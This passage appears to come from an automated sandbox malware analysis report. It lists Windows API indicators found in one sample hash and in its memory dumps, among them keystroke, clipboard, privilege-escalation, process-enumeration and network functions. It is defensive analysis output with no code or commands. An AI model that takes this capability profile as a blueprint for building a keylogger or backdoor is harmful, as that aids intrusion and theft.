\"CopyFileA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"SetFileTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetACP\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetLocalTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CreatePipe\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"PeekNamedPipe\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetCPInfo\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"TerminateThread\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GlobalUnlock\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetTimeZoneInformation\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CompareStringW\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetStringTypeA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"FindFirstFileA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"OpenMutexA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"SetStdHandle\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetComputerNameA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"FindNextFileA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"RemoveDirectoryA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"ExitThread\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GlobalLock\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetStringTypeW\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GlobalMemoryStatus\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetEnvironmentVariableA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"HeapCreate\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GlobalAlloc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"FindClose\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"HeapDestroy\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"Sleep\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetFileType\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"SetEndOfFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetVersion\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CompareStringA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetAsyncKeyState\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"PostMessageA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"EnumWindows\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"EnumChildWindows\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetWindowTextA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CloseClipboard\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"ExitWindowsEx\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetClipboardData\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"OpenClipboard\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"InternetConnectA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"InternetCrackUrlA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"WSASocketA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"htonl\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"WSAStartup\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"getsockname\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"htons\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"gethostname\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"closesocket\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"ntohl\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"inet_addr\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"ntohs\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"gethostbyaddr\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"__WSAFDIsSet\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"WSACleanup\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"gethostbyname\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"inet_ntoa\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"WSAAsyncSelect\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"WSAIoctl\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetActiveWindow\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"WinHelp\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"InternetGetConnectedStateEx\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"Process32First\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00005056.00000000.139963.0041A000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005056.00000000.139963.0041A000.00000040.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005056.00000000.139963.0041A000.00000040.mdmp, 00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005056.00000000.139963.00423000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLocalTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalUnlock\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalLock\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalMemoryStatus\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindNextFileA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitThread\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreatePipe\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalAlloc\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetComputerNameA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CompareStringW\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CompareStringA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetEndOfFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetStdHandle\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileType\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetHandleCount\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateThread\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CopyFileA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"PeekNamedPipe\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapCreate\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapDestroy\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariableA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetVersion\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTimeZoneInformation\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RemoveDirectoryA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ControlService\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteKeyA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"QueryServiceStatus\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumDependentServicesA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LookupPrivilegeValueA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetUserNameA\"; Source: 